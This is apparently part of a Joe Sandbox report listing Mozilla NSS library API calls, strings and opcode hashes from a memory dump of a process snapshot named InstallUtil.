                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(*,|l), ref: 6C7C0C81
                                                                                                                    • Part of subcall function 6C7ABE30: SECOID_FindOID_Util.NSS3(6C76311B,00000000,?,6C76311B,?), ref: 6C7ABE44
                                                                                                                    • Part of subcall function 6C798500: SECOID_GetAlgorithmTag_Util.NSS3(6C7995DC,00000000,00000000,00000000,?,6C7995DC,00000000,00000000,?,6C777F4A,00000000,?,00000000,00000000), ref: 6C798517
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7C0CC4
                                                                                                                    • Part of subcall function 6C7AFAB0: free.MOZGLUE(?,-00000001,?,?,6C74F673,00000000,00000000), ref: 6C7AFAC7
                                                                                                                  • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C7C0CD5
                                                                                                                  • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C7C0D1D
                                                                                                                  • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C7C0D3B
                                                                                                                  • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C7C0D7D
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C7C0DB5
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7C0DC1
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C7C0DF7
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7C0E05
                                                                                                                  • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C7C0E0F
                                                                                                                    • Part of subcall function 6C7995C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C777F4A,00000000,?,00000000,00000000), ref: 6C7995E0
                                                                                                                    • Part of subcall function 6C7995C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C777F4A,00000000,?,00000000,00000000), ref: 6C7995F5
                                                                                                                    • Part of subcall function 6C7995C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C799609
                                                                                                                    • Part of subcall function 6C7995C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C79961D
                                                                                                                    • Part of subcall function 6C7995C0: PK11_GetInternalSlot.NSS3 ref: 6C79970B
                                                                                                                    • Part of subcall function 6C7995C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C799756
                                                                                                                    • Part of subcall function 6C7995C0: PK11_GetIVLength.NSS3(?), ref: 6C799767
                                                                                                                    • Part of subcall function 6C7995C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C79977E
                                                                                                                    • Part of subcall function 6C7995C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C79978E
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                                                  • String ID: *,|l$*,|l$-$|l
                                                                                                                  • API String ID: 3136566230-2839495522
                                                                                                                  APIs
                                                                                                                  • SEC_ASN1DecodeItem_Util.NSS3(?,?,6C881DE0,?), ref: 6C7B6CFE
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7B6D26
                                                                                                                  • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C7B6D70
                                                                                                                  • PORT_Alloc_Util.NSS3(00000480), ref: 6C7B6D82
                                                                                                                  • DER_GetInteger_Util.NSS3(?), ref: 6C7B6DA2
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7B6DD8
                                                                                                                  • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C7B6E60
                                                                                                                  • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C7B6F19
                                                                                                                  • PK11_DigestBegin.NSS3(00000000), ref: 6C7B6F2D
                                                                                                                  • PK11_DigestOp.NSS3(?,?,00000000), ref: 6C7B6F7B
                                                                                                                  • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C7B7011
                                                                                                                  • PK11_FreeSymKey.NSS3(00000000), ref: 6C7B7033
                                                                                                                  • free.MOZGLUE(?), ref: 6C7B703F
                                                                                                                  • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C7B7060
                                                                                                                  • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C7B7087
                                                                                                                  • PR_SetError.NSS3(FFFFE062,00000000), ref: 6C7B70AF
                                                                                                                  Similarity
                                                                                                                  • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2108637330-0
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,6C75AB95,00000000,?,00000000,00000000,00000000), ref: 6C77AF25
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,6C75AB95,00000000,?,00000000,00000000,00000000), ref: 6C77AF39
                                                                                                                  • PR_Unlock.NSS3(?,?,?,6C75AB95,00000000,?,00000000,00000000,00000000), ref: 6C77AF51
                                                                                                                  • PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C75AB95,00000000,?,00000000,00000000,00000000), ref: 6C77AF69
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C77B06B
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C77B083
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C77B0A4
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C77B0C1
                                                                                                                  • EnterCriticalSection.KERNEL32(00000000), ref: 6C77B0D9
                                                                                                                  • PR_Unlock.NSS3 ref: 6C77B102
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C77B151
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C77B182
                                                                                                                    • Part of subcall function 6C7AFAB0: free.MOZGLUE(?,-00000001,?,?,6C74F673,00000000,00000000), ref: 6C7AFAC7
                                                                                                                  • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C77B177
                                                                                                                    • Part of subcall function 6C7FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7FC2BF
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C75AB95,00000000,?,00000000,00000000,00000000), ref: 6C77B1A2
                                                                                                                  • PR_GetCurrentThread.NSS3(?,?,?,?,6C75AB95,00000000,?,00000000,00000000,00000000), ref: 6C77B1AA
                                                                                                                  • PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C75AB95,00000000,?,00000000,00000000,00000000), ref: 6C77B1C2
                                                                                                                    • Part of subcall function 6C7A1560: TlsGetValue.KERNEL32(00000000,?,6C770844,?), ref: 6C7A157A
                                                                                                                    • Part of subcall function 6C7A1560: EnterCriticalSection.KERNEL32(?,?,?,6C770844,?), ref: 6C7A158F
                                                                                                                    • Part of subcall function 6C7A1560: PR_Unlock.NSS3(?,?,?,?,6C770844,?), ref: 6C7A15B2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
                                                                                                                  • String ID:
                                                                                                                  APIs
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C79E5A0
                                                                                                                    • Part of subcall function 6C7FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7FC2BF
                                                                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C79E5F2
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorValuememcpy
                                                                                                                  • String ID: 0
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(#?wl,?,6C76E477,?,?,?,00000001,00000000,?,?,6C773F23,?), ref: 6C772C62
                                                                                                                  • EnterCriticalSection.KERNEL32(0000001C,?,6C76E477,?,?,?,00000001,00000000,?,?,6C773F23,?), ref: 6C772C76
                                                                                                                  • PL_HashTableLookup.NSS3(00000000,?,?,6C76E477,?,?,?,00000001,00000000,?,?,6C773F23,?), ref: 6C772C86
                                                                                                                  • PR_Unlock.NSS3(00000000,?,?,?,?,6C76E477,?,?,?,00000001,00000000,?,?,6C773F23,?), ref: 6C772C93
                                                                                                                    • Part of subcall function 6C7FDD70: TlsGetValue.KERNEL32 ref: 6C7FDD8C
                                                                                                                    • Part of subcall function 6C7FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7FDDB4
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,6C76E477,?,?,?,00000001,00000000,?,?,6C773F23,?), ref: 6C772CC6
                                                                                                                  • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C76E477,?,?,?,00000001,00000000,?,?,6C773F23,?), ref: 6C772CDA
                                                                                                                  • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C76E477,?,?,?,00000001,00000000,?,?,6C773F23), ref: 6C772CEA
                                                                                                                  • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C76E477,?,?,?,00000001,00000000,?), ref: 6C772CF7
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C76E477,?,?,?,00000001,00000000,?), ref: 6C772D4D
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C772D61
                                                                                                                  • PL_HashTableLookup.NSS3(?,?), ref: 6C772D71
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C772D7E
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407AD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407CD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407D6
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6D204A), ref: 6C7407E4
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,6C6D204A), ref: 6C740864
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C740880
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,6C6D204A), ref: 6C7408CB
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408D7
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408FB
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                                                  • String ID: #?wl
                                                                                                                  APIs
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C82A4E6
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C82A4F9
                                                                                                                  • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C82A553
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C82A5AC
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C82A5F7
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C82A60C
                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000110E1,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C82A633
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C82A671
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C82A69A
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: _byteswap_ulong$_byteswap_ushortsqlite3_log
                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                  APIs
                                                                                                                  • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,6C751984,?), ref: 6C7545F2
                                                                                                                  • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C7545FB
                                                                                                                    • Part of subcall function 6C7B0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7B08B4
                                                                                                                  • SECITEM_CompareItem_Util.NSS3(00000000,-00000001), ref: 6C75461E
                                                                                                                    • Part of subcall function 6C7AFCB0: memcmp.VCRUNTIME140(?,8B0B74C0,04C6831E,?,00000000,?,6C754101,00000000,?,?,?,6C751666,?,?), ref: 6C7AFCF2
                                                                                                                  • SECITEM_CopyItem_Util.NSS3(00000000,?,-00000019), ref: 6C754646
                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C754662
                                                                                                                  • PR_SetError.NSS3(FFFFE023,00000000), ref: 6C75467A
                                                                                                                  • PR_CallOnce.NSS3(6C8B2AA4,6C7B12D0), ref: 6C754691
                                                                                                                  • PL_FreeArenaPool.NSS3 ref: 6C7546A3
                                                                                                                  • PL_FinishArenaPool.NSS3 ref: 6C7546AB
                                                                                                                  • free.MOZGLUE(?), ref: 6C7546BC
                                                                                                                  • PORT_ZAlloc_Util.NSS3(?), ref: 6C7546E5
                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C754717
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$ArenaItem_Pool$Error$Alloc_CallCompareCopyDecodeFindFinishFreeInitOnceQuickTag_freememcmpmemcpy
                                                                                                                  • String ID: security
                                                                                                                  APIs
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7CADB1
                                                                                                                    • Part of subcall function 6C7ABE30: SECOID_FindOID_Util.NSS3(6C76311B,00000000,?,6C76311B,?), ref: 6C7ABE44
                                                                                                                  • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C7CADF4
                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C7CAE08
                                                                                                                    • Part of subcall function 6C7AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8818D0,?), ref: 6C7AB095
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7CAE25
                                                                                                                  • PL_FreeArenaPool.NSS3 ref: 6C7CAE63
                                                                                                                  • PR_CallOnce.NSS3(6C8B2AA4,6C7B12D0), ref: 6C7CAE4D
                                                                                                                    • Part of subcall function 6C6D4C70: TlsGetValue.KERNEL32(?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4C97
                                                                                                                    • Part of subcall function 6C6D4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4CB0
                                                                                                                    • Part of subcall function 6C6D4C70: PR_Unlock.NSS3(?,?,?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4CC9
                                                                                                                  • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7CAE93
                                                                                                                  • PR_CallOnce.NSS3(6C8B2AA4,6C7B12D0), ref: 6C7CAECC
                                                                                                                  • PL_FreeArenaPool.NSS3 ref: 6C7CAEDE
                                                                                                                  • PL_FinishArenaPool.NSS3 ref: 6C7CAEE6
                                                                                                                  • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7CAEF5
                                                                                                                  • PL_FinishArenaPool.NSS3 ref: 6C7CAF16
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                                                                                  • String ID: security
                                                                                                                  • API String ID: 3441714441-3315324353
                                                                                                                  • Opcode ID: dc52872ff15ffaa664b533aa718b75b36141727666605c9d8f1cd060323721e7
                                                                                                                  • Instruction ID: 8294814eb25b55fb675e2654446cb4539f906d3429dc611c6bae4c2917f9538f
                                                                                                                  • Opcode Fuzzy Hash: dc52872ff15ffaa664b533aa718b75b36141727666605c9d8f1cd060323721e7
                                                                                                                  • Instruction Fuzzy Hash: B0413BB1A043016FE7205B14AE4EBAB32BCAF5272EF140635E914A2F41F735D608C6D7
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6C819890: TlsGetValue.KERNEL32(?,?,?,6C8197EB), ref: 6C81989E
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C86AF88
                                                                                                                  • _PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6C86AFCE
                                                                                                                  • PR_SetPollableEvent.NSS3(?), ref: 6C86AFD9
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C86AFEF
                                                                                                                  • _PR_MD_NOTIFY_CV.NSS3(?), ref: 6C86B00F
                                                                                                                  • _PR_MD_UNLOCK.NSS3(?), ref: 6C86B02F
                                                                                                                  • _PR_MD_UNLOCK.NSS3(?), ref: 6C86B070
                                                                                                                  • PR_JoinThread.NSS3(?), ref: 6C86B07B
                                                                                                                  • free.MOZGLUE(?), ref: 6C86B084
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C86B09B
                                                                                                                  • _PR_MD_UNLOCK.NSS3(?), ref: 6C86B0C4
                                                                                                                  • PR_JoinThread.NSS3(?), ref: 6C86B0F3
                                                                                                                  • free.MOZGLUE(?), ref: 6C86B0FC
                                                                                                                  • PR_JoinThread.NSS3(?), ref: 6C86B137
                                                                                                                  • free.MOZGLUE(?), ref: 6C86B140
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 235599594-0
                                                                                                                  • Opcode ID: ad74f8e109841c15ee3df285b83c50e050fa7e337add5e1c80e79b880ead30c7
                                                                                                                  • Instruction ID: 9503cc01ecea806310f2ce9a671d8b0b38776c41465e367b1bfd1622eab4391f
                                                                                                                  • Opcode Fuzzy Hash: ad74f8e109841c15ee3df285b83c50e050fa7e337add5e1c80e79b880ead30c7
                                                                                                                  • Instruction Fuzzy Hash: AA915BB5900611DFCB20DF19D98095ABBF1BF4931C7298979D8195BB22E732FC46CB81
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(?,?), ref: 6C768E22
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C768E36
                                                                                                                  • memset.VCRUNTIME140(?,00000000,?), ref: 6C768E4F
                                                                                                                  • calloc.MOZGLUE(00000001,?,?,?), ref: 6C768E78
                                                                                                                  • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C768E9B
                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C768EAC
                                                                                                                  • PL_ArenaAllocate.NSS3(?,?), ref: 6C768EDE
                                                                                                                  • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C768EF0
                                                                                                                  • memset.VCRUNTIME140(?,00000000,?), ref: 6C768F00
                                                                                                                  • free.MOZGLUE(?), ref: 6C768F0E
                                                                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C768F39
                                                                                                                  • memset.VCRUNTIME140(?,00000000,?), ref: 6C768F4A
                                                                                                                  • memset.VCRUNTIME140(?,00000000,?), ref: 6C768F5B
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C768F72
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C768F82
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1569127702-0
                                                                                                                  • Opcode ID: 0bf6663853fe33175d28f8a588a722b1fcc03c0e1ca05b0e32d1517f12191b86
                                                                                                                  • Instruction ID: e139a44ad5d32dfa3b1c487cc682dc8c0364261fe297cfa0450ed2739be6c3a1
                                                                                                                  • Opcode Fuzzy Hash: 0bf6663853fe33175d28f8a588a722b1fcc03c0e1ca05b0e32d1517f12191b86
                                                                                                                  • Instruction Fuzzy Hash: F55106B2E002059FD7109F6ACD889AEB7B9EF56358F14453AEC089BB00E731ED4587E1
                                                                                                                  APIs
                                                                                                                  • PR_Lock.NSS3(?), ref: 6C861000
                                                                                                                    • Part of subcall function 6C819BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C741A48), ref: 6C819BB3
                                                                                                                    • Part of subcall function 6C819BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C741A48), ref: 6C819BC8
                                                                                                                  • PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C861016
                                                                                                                    • Part of subcall function 6C7FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7FC2BF
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C861021
                                                                                                                    • Part of subcall function 6C7FDD70: TlsGetValue.KERNEL32 ref: 6C7FDD8C
                                                                                                                    • Part of subcall function 6C7FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7FDDB4
                                                                                                                  • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C861046
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C86106B
                                                                                                                  • PR_Lock.NSS3 ref: 6C861079
                                                                                                                  • PR_Unlock.NSS3 ref: 6C861096
                                                                                                                  • free.MOZGLUE(?), ref: 6C8610A7
                                                                                                                  • free.MOZGLUE(?), ref: 6C8610B4
                                                                                                                  • PR_DestroyCondVar.NSS3(?), ref: 6C8610BF
                                                                                                                  • PR_DestroyCondVar.NSS3(?), ref: 6C8610CA
                                                                                                                  • PR_DestroyCondVar.NSS3(?), ref: 6C8610D5
                                                                                                                  • PR_DestroyCondVar.NSS3(?), ref: 6C8610E0
                                                                                                                  • PR_DestroyLock.NSS3(?), ref: 6C8610EB
                                                                                                                  • free.MOZGLUE(?), ref: 6C861105
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 8544004-0
                                                                                                                  • Opcode ID: c1492b7eaa133315b9af165cdf666b9c2444a591bfcc6eed60da26d3c63b3d5e
                                                                                                                  • Instruction ID: 22efc4734696879ba67f5a1940f57450c0840c59e43ef155bfa86061048d6e8b
                                                                                                                  • Opcode Fuzzy Hash: c1492b7eaa133315b9af165cdf666b9c2444a591bfcc6eed60da26d3c63b3d5e
                                                                                                                  • Instruction Fuzzy Hash: E0318DB5900402ABDB219F15EE8AA45B771FF0132DF184531E80946F62E732F978EBD6
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6C7AA0A0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C77A5DF,?,00000000,6C7528AD,00000000,?,6C77A5DF,?,object), ref: 6C7AA0C0
                                                                                                                    • Part of subcall function 6C7AA0A0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C77A5DF,?,00000000,6C7528AD,00000000,?,6C77A5DF,?,object), ref: 6C7AA0E8
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7A2834
                                                                                                                  • memcmp.VCRUNTIME140(00000000,00000020,00000020,?,?,?,?,?,?,?,?), ref: 6C7A284B
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7A2A98
                                                                                                                  • memcmp.VCRUNTIME140(00000000,?,00000020,?,?,?,?,?,?,?,?,?,?), ref: 6C7A2AAF
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7A2BDC
                                                                                                                  • memcmp.VCRUNTIME140(00000000,?,00000010,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A2BF3
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7A2D23
                                                                                                                  • memcmp.VCRUNTIME140(00000000,?,00000010,?,?,?,?,?,?,?,?,?), ref: 6C7A2D34
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcmpstrlen$strcmp
                                                                                                                  • String ID: $OQwl$manufacturer$model$serial$token
                                                                                                                  • API String ID: 2407968032-3046293269
                                                                                                                  • Opcode ID: a401fa3b11cf5cf94b3b2bef0a5a31c701a06217ff68f61f75a16162ef89d75c
                                                                                                                  • Instruction ID: 0b143b3102a7f64e10ca6a2eb6b2af7f3effbd4459171f97b38f38bb6d868d96
                                                                                                                  • Opcode Fuzzy Hash: a401fa3b11cf5cf94b3b2bef0a5a31c701a06217ff68f61f75a16162ef89d75c
                                                                                                                  • Instruction Fuzzy Hash: AD02CDA1E0C3C96EF73587A3C98DBE13AE05B0531CF4D16F5D94D8BA93D2AC098A9351
                                                                                                                  APIs
                                                                                                                  • PORT_Alloc_Util.NSS3(?), ref: 6C79EE0B
                                                                                                                    • Part of subcall function 6C7B0BE0: malloc.MOZGLUE(6C7A8D2D,?,00000000,?), ref: 6C7B0BF8
                                                                                                                    • Part of subcall function 6C7B0BE0: TlsGetValue.KERNEL32(6C7A8D2D,?,00000000,?), ref: 6C7B0C15
                                                                                                                  • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C79EEE1
                                                                                                                    • Part of subcall function 6C791D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C791D7E
                                                                                                                    • Part of subcall function 6C791D50: EnterCriticalSection.KERNEL32(?), ref: 6C791D8E
                                                                                                                    • Part of subcall function 6C791D50: PR_Unlock.NSS3(?), ref: 6C791DD3
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C79EE51
